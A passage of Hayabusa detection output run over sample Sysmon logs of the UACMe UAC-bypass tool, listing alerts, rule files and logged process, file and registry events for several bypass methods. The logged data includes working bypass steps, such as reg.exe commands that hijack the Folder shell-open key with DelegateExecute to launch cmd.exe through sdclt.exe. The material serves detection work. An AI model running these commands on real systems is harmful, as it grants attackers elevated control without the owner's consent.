MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.972 